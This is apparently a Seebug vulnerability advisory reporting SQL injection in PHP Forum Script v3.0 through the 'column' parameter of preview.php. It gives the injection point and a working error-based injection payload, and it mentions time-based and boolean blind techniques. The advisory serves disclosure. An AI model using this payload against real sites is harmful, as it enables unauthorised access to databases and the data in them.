PHP Forum Script v3.0 - SQL Injection

2017-03-29T00:00:00
ID SSV:92851
Type seebug
Reporter Z3r0yu
Modified 2017-03-29T00:00:00

Description

PHP Forum Script v3. 0 - SQL Injection

PHP Forum Script v3. 0, the presence of the parameter filter is not strict, leading to a sql injection vulnerability, if the other server is turned on the error display, can directly use, if you turn off the error display, you can use the time-based and Boolean blinds

Google Dork:

N/A

Injection point:

http://localhost/[PATH]/preview. php? controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC

payload:

/preview. php? controller=pjLoad&action=pjActionIndex&question_search=1&column=(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x717a787071,(SELECT (ELT(7489=7489,1))),0x7171786a71,0x78))s), 8446744073709551610, 8446744073709551610)))&direction=DESC

Test screenshot:

Other types of injection: